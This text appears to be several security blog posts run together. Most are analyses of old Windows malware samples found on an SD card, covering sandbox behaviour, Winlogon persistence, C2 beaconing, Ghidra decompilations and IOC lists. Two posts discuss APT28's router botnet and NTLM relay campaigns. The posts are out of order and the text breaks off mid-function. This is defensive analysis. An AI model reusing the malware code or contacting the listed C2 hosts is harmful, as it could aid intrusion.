Set common I/O mode: Similarly, __p__commode() retrieves a pointer to the common I/O mode variable, which is set to DAT_004260f4, adjusting runtime I/O behavior.

Adjust floating-point division: The global variable _DAT_00426144 is set to the value from _adjust_fdiv_exref, likely configuring how floating-point division is handled (e.g., enabling or disabling adjustments for certain edge cases).

Call initialization function: FUN_00402122() is called (its purpose isn’t clear from the snippet alone, but it’s likely an initialization routine for the runtime environment).

Set math error handler (conditional): If DAT_004261c8 is 0, __setusermatherr(&DAT_0042638c) is called to set a custom handler for math errors (e.g., division by zero). This is part of floating-point exception management.

Repeat initialization function: FUN_00402122() is called again, possibly to ensure proper setup after the math error handler check.

Initialize runtime sections: _initterm(&DAT_0042603c, &DAT_0042603c) is called to initialize a section of the program (likely the C runtime library’s initialization table). The identical start and end arguments suggest it might be a placeholder or specific to this decompilation.

Set argument parsing mode: The newmode field of local_88 (a _startupinfo structure) is set to DAT_004261ec, configuring how command-line arguments are processed.

Parse command-line arguments: __getmainargs(&local_7c, &local_8c, &local_80, DAT_00426180, &local_88) retrieves the program’s command-line arguments, storing the count in local_7c, argument array in local_8c, and environment variables in local_80.

Reinitialize runtime sections: _initterm(&DAT_0042603c, &DAT_0042603c) is called again, possibly to finalize initialization after argument parsing.

Process command-line string: The code retrieves the command-line string via _acmdln_exref and processes it:

• If the string starts with a quote (“, ASCII 0x22), it skips characters until it finds a closing quote or the end of the string.
• If it doesn’t start with a quote, it skips characters until it finds a space-like character (ASCII < 0x21, e.g., space, tab, or null).
• After finding the end of the first argument, it skips additional whitespace (characters < 0x21) until a non-whitespace character or null is encountered.

Get startup information: GetStartupInfoA(&local_78) retrieves information about how the process was started (e.g., window settings), storing it in local_78 (a _STARTUPINFOA structure). The dwFlags field is initialized to 0 beforehand.

Get module handle: GetModuleHandleA(0) retrieves the handle of the current executable module (passing 0 gets the handle of the calling process’s executable).

Call main function: FUN_00401000(extraout_ECX) is invoked, with extraout_ECX (likely the argument count or a related value) passed as an argument. This is presumably the program’s main logic, and its return value is stored in local_84. (The exact purpose of extraout_ECX depends on the calling convention and context.)

Exit the program: The function calls exit(local_84), terminating the program with the return code from FUN_00401000. The comment “Subroutine does not return” indicates that exit() halts execution, so no further instructions in this function are executed.

OSINT

Filename	dcubkr.exe
VirusTotal Score	n/a
MD5	c948d76f4c6c483d8bb93c16ae65324f
SHA1	1518a004b6cbc91bdb536e33dc0d6b3562f507d2
SHA256	e9eedc716558d925fa19b90aa43ae4f15b98f874b94c84a3e7ef3230810d198e

slade.safehousenumber[.]com
9/94, https://www.virustotal.com/gui/domain/slade.safehousenumber.com
URLScan reaches the domain but produces a blank white page: https://urlscan.io/result/019567f0-6bd6-7669-976e-9da47cfe8b30/

44.221.84[.]105
1/94, https://www.virustotal.com/gui/ip-address/44.221.84.105
IP is AWS owned and serves many other domains — both legitimate and malicious.
URLScan also shows a blank page: https://urlscan.io/result/01956809-0a45-7eed-925f-fe6e637b1665/

portal.roomshowerbord[.]com
5/94, https://www.virustotal.com/gui/domain/portal.roomshowerbord.com
Known malware C2 domain.

193.166.255[.]171
2/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
Large Finnish ISP that provides hundreds of resolutions.
URLScan shows the IP does not provide a web page: https://urlscan.io/result/01956a2a-e667-7bb8-9f13-23e97f7e4d0f/

Conclusion

Malware reaches out to C2 for second stage but these are no longer functioning — even though the domains are still alive.

IOCs

44.221.84[.]105

193.166.255[.]171

portal.roomshowerbord[.]com

slade.safehousenumber[.]com

world.rickstudio[.]ru

banana.cocolands[.]su

c948d76f4c6c483d8bb93c16ae65324f

1518a004b6cbc91bdb536e33dc0d6b3562f507d2

e9eedc716558d925fa19b90aa43ae4f15b98f874b94c84a3e7ef3230810d198e

dcubkr.exe

This is more or less a part three to the naprava.exe analysis. Turns out the SD card holds many malicious surprises.

Again, this is a 14-year-old malware executable from Moldova that was inadvertently stored on a SD card.

Analysis

Submitted the file to AnyRun. The file performs the following actions (with the respective timestamps):

+47ms	File drops C:\Users\admin\lzmjqt.exe
+63ms	lzmjqt.exe writes a new shell key to WinLogon registry
+218ms	Creates process svchost.exe
+281ms	svchost.exe runs file C:\Users\admin\lzmjqt.exe
+1313ms	DNS request to slade.safehousenumber[.]com
+31039ms	murik.portal-protection[.]net[.]ru
+60758ms	world.rickstudio[.]ru
+91480ms	banana.cocolands[.]su
+121s	DNS request to portal.roomshowerbord[.]com
+150s	DNS request to slade.safehousenumber[.]com
+271s	DNS request to portal.roomshowerbord[.]com

The executable drops the lzmjqt.exe. This second executable writes a persistent reverse shell to the WinLogon registry. Then the original executable creates a svchost.exe process. The svchost.exe then runs the dropped file. This malware then reaches out to its C2 domains — slade.safehousenumber[.]com and portal.roomshowerbord[.]com.

AnyRun captured a pcap and the DNS output is such:

The first request sent to safehousenumber (44.221.84[.]105)received a response, containing the following bytes:

The second request is sent to portal.roomshowerbord[.]com (193.166.255[.]171) and the response is received, containing the following bytes:

Reverse engineering the malware with Ghidra gives the following decompilation:

void entry(void)

{
  undefined4 *puVar1;
  undefined4 extraout_ECX;
  undefined4 extraout_EDX;
  byte *pbVar2;
  char **local_74;
  _startupinfo local_70;
  int local_6c;
  char **local_68;
  int local_64;
  _STARTUPINFOA local_60;
  undefined *local_1c;
  void *pvStack_14;
  undefined *puStack_10;
  undefined *puStack_c;
  undefined4 local_8;
  
  puStack_c = &DAT_0040f058;
  puStack_10 = &DAT_0040e0a8;
  pvStack_14 = ExceptionList;
  local_1c = &stack0xffffff74;
  local_8 = 0;
  ExceptionList = &pvStack_14;
  __set_app_type(2);
  _DAT_00411de8 = 0xffffffff;
  _DAT_0040f030 = 0xffffffff;
  puVar1 = (undefined4 *)__p__fmode();
  *puVar1 = DAT_0040f040;
  puVar1 = (undefined4 *)__p__commode();
  *puVar1 = DAT_0040f020;
  _DAT_00411ddc = *(undefined4 *)_adjust_fdiv_exref;
  FUN_0040e07a();
  if (DAT_00411de4 == 0) {
    __setusermatherr(&DAT_004185c4);
  }
  FUN_0040e07a();
  _initterm(&DAT_0040f03c,&DAT_0040f03c);
  local_70.newmode = DAT_00411dd0;
  __getmainargs(&local_64,&local_74,&local_68,DAT_00411de0,&local_70);
  _initterm(&DAT_0040f03c,&DAT_0040f03c);
  pbVar2 = *(byte **)_acmdln_exref;
  if (*pbVar2 != 0x22) {
    do {
      if (*pbVar2 < 0x21) goto LAB_0040e01b;
      pbVar2 = pbVar2 + 1;
    } while( true );
  }
  do {
    pbVar2 = pbVar2 + 1;
    if (*pbVar2 == 0) break;
  } while (*pbVar2 != 0x22);
  if (*pbVar2 != 0x22) goto LAB_0040e01b;
  do {
    pbVar2 = pbVar2 + 1;
LAB_0040e01b:
  } while ((*pbVar2 != 0) && (*pbVar2 < 0x21));
  local_60.dwFlags = 0;
  GetStartupInfoA(&local_60);
  GetModuleHandleA((LPCSTR)0x0);
  local_6c = FUN_0040dee8(extraout_ECX,extraout_EDX);
                    /* WARNING: Subroutine does not return */
  exit(local_6c);
}

This executable function is the runtime startup routine that:

1. Sets up exception handling.
2. Configures the application type as a console app.
3. Initializes global variables (e.g., file mode, floating-point settings).
4. Runs initializers (e.g., C++ constructors) via _initterm.
5. Retrieves and parses command-line arguments.
6. Gathers startup information.
7. Calls the user-defined main function (FUN_0040dee8).
8. Exits with main’s return value.

We would need the dropped binary to see what the real malware does.

OSINT

Filename	7zsfx.exe
VirusTotal Score	18/43
MD5	3aeb8c1edb3810196a3eff1c7a4188b2
SHA1	f117f6cbdc33cace7ee8026f8eebfc7a04a58a3c
SHA256	0477e8fa82354dc04fc44a23a05b069909aa5525f3ea474c2217a5a16a734aa2

VirusTotal upload shows the file is not signed but has a Product description of “Trend Micro AntiVirus Plus AntiSpyware”. It is categorized as part of the armadillo malware family.

slade.safehousenumber[.]com
9/94, https://www.virustotal.com/gui/domain/slade.safehousenumber.com
URLScan reaches the domain but produces a blank white page: https://urlscan.io/result/019567f0-6bd6-7669-976e-9da47cfe8b30/

44.221.84[.]105
1/94, https://www.virustotal.com/gui/ip-address/44.221.84.105
IP is AWS owned and serves many other domains — both legitimate and malicious.
URLScan also shows a blank page: https://urlscan.io/result/01956809-0a45-7eed-925f-fe6e637b1665/

portal.roomshowerbord[.]com
5/94, https://www.virustotal.com/gui/domain/portal.roomshowerbord.com
Known malware C2 domain.

193.166.255[.]171
2/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
Large Finnish ISP that provides hundreds of resolutions.
URLScan shows the IP does not provide a web page: https://urlscan.io/result/01956a2a-e667-7bb8-9f13-23e97f7e4d0f/

Conclusion

Malware reaches out to C2 for second stage but these are no longer functioning — even though the domains are still alive.

IOCs

44.221.84[.]105

193.166.255[.]171

portal.roomshowerbord[.]com

slade.safehousenumber[.]com

0477e8fa82354dc04fc44a23a05b069909aa5525f3ea474c2217a5a16a734aa2

Hey everyone. Yeah, it’s another APT28 post. But tracking Russian threats is my favorite pastime.

So, this past month, the U.S. Department of Justice, alongside the FBI, disrupted a botnet controlled by APT28, also known as Fancy Bear. This Russian state-sponsored group, tied to the GRU’s Unit 26165, had hijacked hundreds of small office/home office routers to run espionage operations. The action, announced on February 15, 2024, targeted a network used for spear-phishing and credential harvesting against U.S. and foreign governments, military, and corporate entities. It’s a solid win, but don’t pop the champagne yet—there’s more to this story.

The botnet ran on Ubiquiti EdgeOS routers infected with Moobot malware, a Mirai variant. Non-GRU cybercriminals originally compromised these devices by exploiting default admin passwords—because who doesn’t love a factory-setting roulette? APT28 then swooped in, repurposing the network with custom scripts and files for their spying gig. They used it to mask traffic, steal credentials, and hit targets of intelligence value to Russia. The DoJ’s move, dubbed “Operation Dying Ember,” kicked APT28 off the botnet and cleaned house.

The operation worked like this: the DoJ leveraged Moobot’s own mechanics to copy and delete stolen data from the routers. They also tweaked firewall rules to block remote management, cutting APT28’s access without breaking the routers’ normal functions. Temporary routing data was collected to spot any GRU counter-moves, but no user content was touched. The FBI and partners like Microsoft and Shadowserver helped execute this, proving teamwork makes the Kremlin’s dreams hurt.

APT28’s targets included the usual suspects—government agencies, defense firms, and security orgs. The botnet, active since at least 2022, supported phishing campaigns and brute-force attacks. The DoJ didn’t say how many U.S. routers got hit, but they confirmed infections across nearly every state. Globally, it’s hundreds of devices, maybe more. This wasn’t APT28’s first botnet rodeo—remember VPNFilter in 2018? Same crew, different toys.

Mitigation’s straightforward but requires action. Router owners need to ditch default passwords, update firmware, and reboot devices to clear lingering malware. The FBI’s still sniffing around for APT28 activity, so report anything shady to them or IC3.gov. Patching those routers is key—otherwise, you’re just begging for round two. The DoJ’s disruption is temporary unless users step up.

This fits APT28’s 2024 playbook—NTLM relay attacks, phishing sprees, and now this botnet mess. They’ve been at it since 2007, with hits like the 2016 DNC hack. The February takedown, led by the National Security Division, marks the third time since 2022 the DoJ’s neutered Russian cyber tools tied to Ukraine tensions. Assistant AG Matthew Olsen called it a “two-for-one” hit, nailing both criminal and state-sponsored actors.

By March 26, 2025, it’s clear APT28 took a punch, but they’re not down for the count. The routers are back to normal-ish, though some owners are still clueless their gear was a Russian pawn. Casual aside: if your router’s still rocking “admin123,” you’re basically rolling out the red carpet for Fancy Bear. The DoJ and FBI deserve a nod for this one—it’s not every day you see the feds outsmart a GRU cyber squad. Still, lock down your tech, folks; APT28’s probably already plotting their next move.

Over the the past month, APT28, also known as Fancy Bear, was reported to be using NTLM relay attacks to target high-value organizations globally. This Russian state-sponsored group, tied to the GRU’s Unit 26165, focused on sectors including foreign affairs, energy, defense, and finance. The attacks exploited weaknesses in the NTLM authentication protocol to harvest credentials and infiltrate networks. This campaign, documented by Trend Micro and others, ran from April 2022 to November 2023, with details emerging in early 2024.

APT28’s method involved compromising an initial system, often through phishing or watering hole attacks. Once inside, they leveraged NTLM relay techniques to capture Net-NTLMv2 hashes. These hashes were then used to authenticate to other systems, escalating privileges and accessing sensitive data. The group exploited vulnerabilities like CVE-2023-23397 (Microsoft Outlook privilege escalation) and CVE-2023-38831 (WinRAR code execution) to trigger NTLM authentication requests to attacker-controlled servers. They layered anonymization through compromised EdgeOS routers, VPNs, and data center IPs to cover their tracks.

The targets were predictable: government agencies, critical infrastructure, and financial institutions. Trend Micro noted thousands of email accounts potentially compromised over the campaign’s duration. The February 2, 2024, report from The Hacker News confirmed APT28’s focus on automating brute-force network intrusions, a cost-efficient tactic for a group with a long espionage resume. Data stolen included intellectual property and operational records, with national security implications for affected entities.

On February 15, 2024, the U.S. Department of Justice disrupted an APT28 botnet of Ubiquiti routers used for spear-phishing and credential harvesting. This takedown, detailed by Flashpoint, hit infrastructure likely tied to these NTLM relay efforts. Despite this, APT28’s adaptability—honed since their 2008 debut—suggests they’ve already pivoted. Their history (supposedly) includes the 2016 DNC hack and the 2017 NotPetya attack, so this isn’t their first rodeo.

Fancy Bear’s out here proving NTLM’s the cybersecurity equivalent of a screen door on a submarine—patch it or drown, folks. Defenses exist but require effort. Disabling NTLM where possible, enforcing multi-factor authentication, and segmenting networks limit damage. Patching systems for known exploits like CVE-2023-23397 is non-negotiable—yet many still lag, because who doesn’t love a good zero-day surprise?

The campaign’s scale and persistence reflect APT28’s resources and strategic goals, likely aligned with Russian military intelligence priorities. They’re not subtle—Trend Micro called their tactics “crude and aggressive”—but subtlety’s overrated when you’ve got state backing and a knack for exploiting human laziness. Hey, APT28, maybe send a phishing email that doesn’t scream ‘I’m a Kremlin intern’ next time.

This incident underscores a broader 2024 trend which I completely see growing going into 2025 and beyond: APTs doubling down on old protocols with new tricks. Most infrastructure stays the same for decades, but various applications are built on it. Organizations hit included those in Europe, the Americas, and Asia, per X posts. Mitigation requires diligence—monitor NTLM traffic, enforce signing on SMB/LDAP, and pray your staff don’t click the bait. APT28’s not slowing down; they’re just warming up for the next hash grab. “Sleep tight, sysadmins—Fancy Bear’s got your credentials on speed dial.”

This is more or less a part two to the naprava.exe analysis. Turns out the SD card holds many malicious surprises.

Again, this is a 14-year-old malware executable from Moldova that was inadvertently stored on a SD card.

Analysis

shakira.exe loads the following dlls in chronological order:

• +46ms
  • ntdll.dll
  • kernel32.dll
• +62 ms
  • KernelBase.dll
  • user32.dll
  • gdi32.dll
  • lpk.dll
  • usp10.dll
  • msvcrt.dll
• +78 ms
  • C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
  • advapi32.dll
  • sechost.dll
  • rpcrt4.dll
  • loeaut32.dll
  • ole32.dll
  • shell32.dll
  • shlwapi.dll
  • imm32.dll
  • msctf.dll
• +203 ms
  • apphelp.dll
• +218 ms
  • svchost.exe

The executable runs process svchost.exe. The process drops another executable: C:\Users\admin\xuat.exe. Then xuat.exe writes to the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon with the value explorer.exe,C:\Users\admin\xuat.exe and named Shell. The dropper did this in order to keep persistence at restart and logon. The process then reads many various registry entries regarding network connections.

At +906 ms the process creates a connection to 44.221.84[.]105:33111 (slade.safehousenumber[.]com). The process sends 21 bytes of data via UDP protocol:

At +120 seconds, the xuat.exe process creates a connection to 193.166.255[.]171:33111 (portal.roomshowerbord[.]com). The process sends 21 bytes of data via UDP protocol.

At +128 seconds, the Windows Media Player Network Sharing Service Configuration Application (C:\Program Files\Windows Media Player\wmpnscfg.exe)runs in the background and gathers client information (reads computer name, checks supported languages, and other sysinfo).

At +151 seconds, the xuat.exe process creates a connection to 44.221.84[.]105:33111 (slade.safehousenumber[.]com). The process sends 21 bytes of data via UDP protocol:

The malware seems to gather system information and send it to C2 servers.

Ghidra produced the following decompiled output:

void entry(void)

{
  undefined4 *puVar1;
  undefined4 extraout_ECX;
  uint extraout_EDX;
  byte *pbVar2;
  char **local_74;
  _startupinfo local_70;
  int local_6c;
  char **local_68;
  int local_64;
  _STARTUPINFOA local_60;
  undefined *local_1c;
  void *pvStack_14;
  undefined *puStack_10;
  undefined *puStack_c;
  undefined4 local_8;
  
  puStack_c = &DAT_00412058;
  puStack_10 = &DAT_0041148c;
  pvStack_14 = ExceptionList;
  local_1c = &stack0xffffff6c;
  local_8 = 0;
  ExceptionList = &pvStack_14;
  __set_app_type(2);
  _DAT_00412038 = 0xffffffff;
  _DAT_00412078 = 0xffffffff;
  puVar1 = (undefined4 *)__p__fmode();
  *puVar1 = DAT_0041214c;
  puVar1 = (undefined4 *)__p__commode();
  *puVar1 = DAT_0041206c;
  _DAT_00412070 = *(undefined4 *)_adjust_fdiv_exref;
  FUN_0041147b();
  if (DAT_0041208c == 0) {
    __setusermatherr(&DAT_00412254);
  }
  FUN_0041147b();
  _initterm(&DAT_00412090,&DAT_00412090);
  local_70.newmode = DAT_00412020;
  __getmainargs(&local_64,&local_74,&local_68,DAT_00412080,&local_70);
  _initterm(&DAT_00412090,&DAT_00412090);
  pbVar2 = *(byte **)_acmdln_exref;
  if (*pbVar2 != 0x22) {
    do {
      if (*pbVar2 < 0x21) goto LAB_0041140f;
      pbVar2 = pbVar2 + 1;
    } while( true );
  }
  do {
    pbVar2 = pbVar2 + 1;
    if (*pbVar2 == 0) break;
  } while (*pbVar2 != 0x22);
  if (*pbVar2 != 0x22) goto LAB_0041140f;
  do {
    pbVar2 = pbVar2 + 1;
LAB_0041140f:
  } while ((*pbVar2 != 0) && (*pbVar2 < 0x21));
  local_60.dwFlags = 0;
  GetStartupInfoA(&local_60);
  GetModuleHandleA((LPCSTR)0x0);
  local_6c = FUN_004109ec(extraout_ECX,extraout_EDX);
                    /* WARNING: Subroutine does not return */
  exit(local_6c);

OSINT

shakira.exe
a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
53/64, https://www.virustotal.com/gui/file/a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
Associated with the Armadillo malware packer.

xuat.exe
a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
Same as/Part of above file.

slade.safehousenumber[.]com
9/94, https://www.virustotal.com/gui/domain/slade.safehousenumber.com
GoDaddy registered domain known for phishing.

murik.portal-protection.net[.]ru
3/94, https://www.virustotal.com/gui/domain/murik.portal-protection.net.ru
Domain registered with Russian registrar RU-CENTER-RU. Known malware domain.

banana.cocolands[.]su
5/94, https://www.virustotal.com/gui/domain/banana.cocolands.su
Registered with NIC.ru domain registrar. Known malware domain.

portal.roomshowerbord[.]com
5/94, https://www.virustotal.com/gui/domain/portal.roomshowerbord.com
Domain registered with GoDaddy. Known malware domain.

44.221.84[.]105
1/94, https://www.virustotal.com/gui/ip-address/44.221.84.105/details
Supposedly an Amazon domestic IP. But associated with malware.

193.166.255[.]171
2/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
Finnish IP serving phishing domains.

Conclusion

Definitely similar to naprava.exe. Maybe the same threat actor wrote this malware where I contracted it in the Chisinau, Moldova internet cafe.

Indicators of Compromise

AnyRun Link	https://app.any.run/tasks/abdd8821-c4aa-4f97-9d86-4eb5f1983023
File Path	..\havesit\shakira.exe
File Name	shakira.exe
SHA256	a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
C2 Domain	slade.safehousenumber[.]com
C2 Domain	murik.portal-protection.net[.]ru
C2 Domain	banana.cocolands[.]su
C2 Domain	portal.roomshowerbord[.]com
C2 IP	44.221.84[.]105
C2 IP	193.166.255[.]171

I served a two year ecclesiastical mission in the Republic of Moldova from 2011 to 2013 for the Church of Jesus Christ of Latter-day Saints. I recently dug through boxes of old memories and found SD cards containing photos and videos from those two years in Moldova.

However, after inserting it into my Linux machine’s SD card reader, I found one to contain multiple sub-folders with odd or Russian named Windows executables. These are not part of the SanDisk default directory structure, nor part of the Canon digital camera software directory structure.

File Analysis

../eksplozivna/naprava.exe

Analysis

I uploaded the file to AnyRun: https://app.any.run/tasks/9a5b4267-cc01-40ff-bdef-eff6b1c702a8

The exe called on svchost.exe and loaded the following dlls:

• ntdll.dll
• wow64.dll
• wow64win.dll
• wow64cpu.dll
• kernel32.dll
• KernelBase.dll
• apphelp.dll
• sechost.dll
• rpcrt4.dll
• bcrypt.dll
• ucrtbase.dll

All dlls are legitimately signed.

The exe replaces the legitimate svchost with a modified version. It sends a write event to registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon with the name Shell. This is a big red flag and looks like it is loading a reverse shell to the logon actions.

The program then uses the malicious svchost process to drop another file: cbzvl.exe

The program uses the WinAPI and queries for system information. Then it creates a UDP connection to 45.144.3[.]149 :6600 (peer.pickeklosarske[.]ru)

• 45.144.3[.]149
  • 1/94, https://www.virustotal.com/gui/ip-address/45.144.3.149/relations
  • HK non-cloud IP that has been serving the same two C2 domains for years:
    • peer.pickeklosarske[.]ru
      • 5/94, https://www.virustotal.com/gui/domain/peer.pickeklosarske.ru
      • known C2
    • jebena.ananikolic[.]su
      • 9/94, https://www.virustotal.com/gui/domain/jebena.ananikolic.su
      • known c2

Connection sends 21 bytes. Nothing decipherable in pcap

Another UDP connection is made with 193.166.255[.]171:6600 (teske.pornicarke[.]com) to send another 21 bytes. Also included are additional 21 byte outbound UDP pakcets.

• 193.166.255[.]171
  • 1/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
  • Finnish IP that serves so many domains. Possibly a legitimate malware sinkhole — or just a lie by a malicious commenter.
• teske.pornicarke[.]com
  • 7/94, https://www.virustotal.com/gui/domain/teske.pornicarke.com
  • Known as a C2 for a UDP-based worm since back in 2010.
• 224.0.0[.]252
  • 0/94, https://www.virustotal.com/gui/ip-address/224.0.0.252
  • pcap payload shows ISATAP IPV6 request. Not malicious.
• 208.100.26[.]242
  • 4/94, https://www.virustotal.com/gui/ip-address/208.100.26.242
  • Known C2 server.

Below are the hash analysis of the files:

• naprava.exe
  • SHA256:c1f24e1e78848b9ec2ef0920aa7a4ffed597c2e8cb4dcf221531e411a3058e30
  • 68/73, https://www.virustotal.com/gui/file/c1f24e1e78848b9ec2ef0920aa7a4ffed597c2e8cb4dcf221531e411a3058e30
  • Known as trojan/worm/pua in the malware families palevo, rimecud, and bredolab.
• cbzvl.exe
  • Same as naprava.exe

AnyRun shows the session also reached out to the following IP addresses:

• 184.30.131[.]245
  • 0/94, https://www.virustotal.com/gui/ip-address/184.30.131.245
  • German Akamai IP. Serves digicert and rapidssl.
• 52.149.20[.]212
  • 0/94, https://www.virustotal.com/gui/ip-address/52.149.20.212/relations
  • Microsoft update server. Not malicious.

Ghidra analysis of the malware shows the following decompiled code:

void entry(void)

{
  int in_EAX;
  DWORD DVar1;
  size_t sVar2;
  LPSYSTEMTIME p_Var3;
  int iVar4;
  BOOL BVar5;
  uint uVar6;
  UINT UVar7;
  char extraout_CL;
  ushort extraout_CX;
  short extraout_CX_00;
  undefined4 extraout_ECX;
  uint extraout_ECX_00;
  undefined extraout_DL;
  uint extraout_EDX;
  undefined4 extraout_EDX_00;
  undefined4 extraout_EDX_01;
  uint extraout_EDX_02;
  char *extraout_EDX_03;
  uint extraout_EDX_04;
  int extraout_EDX_05;
  uint extraout_EDX_06;
  uint extraout_EDX_07;
  char *extraout_EDX_08;
  char *extraout_EDX_09;
  uint extraout_EDX_10;
  byte bVar8;
  ushort uVar9;
  uint unaff_EBX;
  ushort uVar10;
  uint unaff_ESI;
  LPSYSTEMTIME p_Var11;
  uint uVar12;
  uint unaff_EDI;
  undefined4 uVar13;
  char cVar14;
  bool bVar15;
  char *pcVar16;
  char *pcVar17;
  char *pcVar18;
  uint local_78;
  LARGE_INTEGER local_70;
  _SYSTEMTIME local_68;
  uint local_58;
  char *local_54;
  uint local_50;
  _SYSTEMTIME local_4c;
  uint local_3c;
  _SYSTEMTIME local_38;
  undefined2 local_28;
  ushort local_24;
  _SYSTEMTIME local_20;
  char *local_10;
  byte local_c;
  byte local_b;
  char local_a;
  undefined local_9;
  LPSYSTEMTIME local_8;
  
  local_8 = (LPSYSTEMTIME)0xfff5abd4;
  if (in_EAX != -0x6f40b600) {
    GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
    unaff_EBX = CONCAT22((short)(unaff_EBX >> 0x10),CONCAT11(local_c,(char)unaff_EBX));
    DAT_0040a0cc = unaff_EDI;
  }
  GetSystemTime(&SYSTEMTIME_0040a0d0);
  strlen("Rscmc Clf, Nqf. Gau");
  DAT_0040a058 = (undefined2)unaff_EBX;
  uVar12 = DAT_0040a0e0;
  GetSystemTime((LPSYSTEMTIME)&DAT_0040a080);
  if (DAT_0040a0cc != unaff_ESI) {
    local_8 = (LPSYSTEMTIME)((int)local_8 + uVar12);
  }
  p_Var11 = (LPSYSTEMTIME)(unaff_ESI & (uint)local_8);
  local_8 = (LPSYSTEMTIME)0x114060;
  DVar1 = GetTickCount();
  if (DVar1 != 0) {
    unaff_EBX = (uint)(char)(unaff_EBX >> 8);
    local_10 = (char *)0x0;
    DAT_0040a05a = extraout_CX;
  }
  cVar14 = local_8 < DVar1;
  local_8 = (LPSYSTEMTIME)((int)local_8 - DVar1);
  uVar13 = CONCAT22((short)(unaff_EDI >> 0x10),DAT_0040a0e4);
  GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
  GetSystemTime(&local_20);
  local_b = (byte)(unaff_EBX >> 8);
  DAT_0040a0c7 = (DAT_0040a0c7 - extraout_CL) - cVar14;
  DAT_0040a008 = puts("Mojjha Phdr. Ygpa");
  _DAT_0040a0e8 = _DAT_0040a0e8 + -0xbe9620;
  DAT_0040a000 = 0;
  puts("Fbwdc Ymrwoelrx");
  GetOEMCP();
  DAT_0040a008 = uVar13;
  strlen("Oyycv La, Jjpfwl");
  DAT_0040a0e0 = DAT_0040a0e0 | extraout_EDX;
  pcVar16 = "Lpdm, Rgcmnbe Wmslc";
  sVar2 = strlen("Lpdm, Rgcmnbe Wmslc");
  if (((LPSYSTEMTIME)local_10 == p_Var11) &&
     (unaff_EBX = unaff_EBX + (-(uint)(local_10 < p_Var11) - sVar2),
     ((uint)pcVar16 & (uint)p_Var11) == 0)) {
    local_10 = (char *)unaff_EBX;
  }
  sVar2 = strlen("Qlmqipqh Gaxmdj Qwl");
  local_8 = (LPSYSTEMTIME)((uint)local_8 | 0x244);
  _DAT_0040a0e8 = extraout_EDX_00;
  if ((short)sVar2 != DAT_0040a0e6) {
    p_Var3 = &local_20;
    GetSystemTime(p_Var3);
    if (p_Var3 == (LPSYSTEMTIME)0x0) {
      unaff_EBX = unaff_EBX & 0xffff0000;
      _DAT_0040a0ec = extraout_ECX;
    }
    unaff_EBX = CONCAT22((short)(unaff_EBX >> 0x10),local_28);
  }
  GetSystemTime(&local_38);
  p_Var3 = &local_4c;
  local_3c = (uint)p_Var11;
  GetSystemTime(p_Var3);
  if ((DAT_0040a0c2 == (short)p_Var3) &&
     (p_Var11 = local_8, _DAT_0040a0f4 = extraout_EDX_01, ((uint)p_Var3 & 0xaafae336) == 0)) {
    DAT_0040a00d = DAT_0040a00d + -0x10;
    p_Var3 = DAT_0040a0c8;
    unaff_EBX = DAT_0040a0f0;
  }
  DAT_0040a0cc = extraout_ECX_00;
  local_8 = p_Var3;
  iVar4 = puts("Cjkh Kpgoft Mrl");
  if (iVar4 == 0) {
    local_10 = (char *)0x0;
    DAT_0040a074 = 0xffffffff;
  }
  DAT_0040a0f8 = DAT_0040a0f8 ^ 0xffff;
  pcVar16 = (char *)CONCAT31((int3)(unaff_EBX >> 8),DAT_0040a00e);
  strlen("Enoutwjs Mngef Ybwg");
  DAT_0040a060 = (char *)0x1d0;
  local_10 = (char *)((uint)local_10 & extraout_EDX_02);
  strlen("Jrkxwqmylr, Tetmf");
  pcVar17 = "Ixjyep. Ths, Tcfbe";
  strlen("Ixjyep. Ths, Tcfbe");
  local_54 = pcVar17;
  local_24 = FUN_00408ce9(pcVar17,extraout_DL);
  pcVar17 = local_10;
  DAT_0040a0fc = 0;
  if ((char)local_24 == 'P') {
    BVar5 = QueryPerformanceCounter((LARGE_INTEGER *)&DAT_0040a090);
    local_24 = (ushort)BVar5;
    _DAT_0040a100 = 0x2c3468;
    pcVar16 = (char *)~(uint)pcVar16;
    GetSystemTime((LPSYSTEMTIME)&DAT_0040a080);
  }
  local_3c = (uint)p_Var11;
  GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
  local_b = 0;
  puts("Homaqmdy Rup Ox");
  iVar4 = puts("Crbw, Kcfsu, Qsqy");
  if ((iVar4 != 0) && (DAT_0040a05a = DAT_0040a05a & (ushort)pcVar16, (int)local_8 <= (int)p_Var11))
  {
    local_a = -1;
  }
  strlen("Sjrk. Yg. Wgkqfp");
  local_50 = 0;
  iVar4 = puts("Gdhthyy Ygcp Gobqc");
  if (local_a == (char)iVar4) {
    bVar15 = CARRY4((uint)p_Var11,(uint)pcVar17);
    p_Var11 = (LPSYSTEMTIME)((int)p_Var11 + (int)pcVar17);
    pcVar16 = extraout_EDX_03 + (uint)bVar15 + CONCAT31((int3)((uint)pcVar16 >> 8),local_c);
    local_58 = 0;
    if (pcVar17 == extraout_EDX_03) {
      _DAT_0040a0bc = 0x2d2be4;
    }
  }
  local_50 = 0x39614c;
  p_Var3 = &local_68;
  GetSystemTime(p_Var3);
  if (p_Var3 == (LPSYSTEMTIME)0x0) {
    DAT_0040a0c8 = (LPSYSTEMTIME)0x26c;
    local_54 = pcVar17;
    local_24 = (ushort)pcVar16;
  }
  _DAT_0040a104 = pcVar17;
  pcVar18 = "Brlptjuj. Lpiul";
  strlen("Brlptjuj. Lpiul");
  local_8 = (LPSYSTEMTIME)((int)local_8 - (int)pcVar18);
  FUN_00407736("Mpspyof. Q");
  GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a108);
  GetTickCount();
  if (local_b != (byte)pcVar16) {
    _DAT_0040a0fa = 0xe8;
